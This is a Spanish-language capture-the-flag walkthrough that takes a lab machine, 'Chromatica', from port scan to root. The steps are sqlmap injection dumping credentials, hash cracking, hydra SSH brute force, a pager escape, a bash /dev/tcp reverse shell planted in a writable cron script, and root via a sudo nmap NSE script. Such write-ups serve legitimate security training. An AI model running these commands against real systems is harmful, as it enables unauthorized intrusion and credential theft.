Enumeramos puertos:
❯ sudo nmap -p- -sS -n -Pn -oG 01-allPorts 192.168.1.23
❯ nmap -sCV -p22,80,5353 -oN 02-targeted.txt 192.168.1.23
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-29 22:21 -04
Nmap scan report for 192.168.1.23
Host is up (0.00029s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Chromatica|Coming Soon.....
5353/tcp open domain dnsmasq 2.86
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelEl robots.txt exige un User-Agent concreto para acceder a /dev-portal/:
❯ cat robots.txt
user-agent: dev
Allow: /dev-portal/
❯ curl -H 'user-agent: dev' http://192.168.1.23/dev-portal/
...
<form action="search.php" method="get">
...El search.php (parámetro city) es vulnerable a SQL Injection. Con sqlmap volcamos la tabla users:
❯ sqlmap -u 'http://192.168.1.23/dev-portal/search.php?city=p*' -H 'User-Agent: dev' --batch --level=5 --risk=3 --dbs --tables
...
Database: Chromatica
[2 tables]
+--------+
| cities |
| users |
+--------+
❯ sqlmap -u 'http://192.168.1.23/dev-portal/search.php?city=p*' -H 'User-Agent: dev' --threads 10 --dump -D Chromatica -T users
...
| 1 | 8d06f5ae0a469178b28bbd34d1da6ef3 | admin | admin |
| 2 | 1ea6762d9b86b5676052d1ebd5f649d7 | dev | developer account for taz |
...Crackeamos los hashes MD5 (crackstation) y hacemos fuerza bruta SSH:
8d06f5ae0a469178b28bbd34d1da6ef3 md5 adm!n
1ea6762d9b86b5676052d1ebd5f649d7 md5 flaghere
3dd0f70a06e2900693fc4b684484ac85 md5 keeptrying
aaf7fb4d4bffb8c8002978a9c9c6ddc9 md5 intern00
❯ hydra -L users.txt -P passwds.txt 192.168.1.23 ssh -t 64
...
[22][ssh] host: 192.168.1.23 login: dev password: flaghere
...La cuenta dev no es de login: al conectar muestra un banner en un pager. Redimensionando la terminal aparece el prompt --More--, del que escapamos a una shell:
--More--(87%)
ESC
!/bin/bash
dev@Chromatica:~$Obtenemos la primera flag. Para movernos a analyst, hay un cronjob que ejecuta un script escribible:
dev@Chromatica:/$ cat /etc/crontab
...
* * * * * analyst /bin/bash /opt/scripts/end_of_day.sh
...
-rwxrwxrw- 1 analyst analyst 30 May 30 03:00 end_of_day.shLe inyectamos una reverse shell:
dev@Chromatica:/opt/scripts$ cat end_of_day.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.1.5/4321 0>&1
❯ ncat -nlvp 4321
Ncat: Connection from 192.168.1.23:44478.
bash: cannot set terminal process group (3699): Inappropriate ioctl for device
bash: no job control in this shell
analyst@Chromatica:~$Revisamos sudo -l:
analyst@Chromatica:~$ sudo -l
...
User analyst may run the following commands on Chromatica:
(ALL : ALL) NOPASSWD: /usr/bin/nmapnmap permite ejecutar un script NSE; creamos uno que lanza una shell:
analyst@Chromatica:/tmp$ cat pwned
os.execute("/bin/sh")
analyst@Chromatica:/tmp$ sudo nmap --script=pwned
Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-30 04:02 UTC
NSE: Warning: Loading 'pwned' -- the recommended file extension is '.nse'.
# whoami
rootObtenemos nuestra flag.
Fin.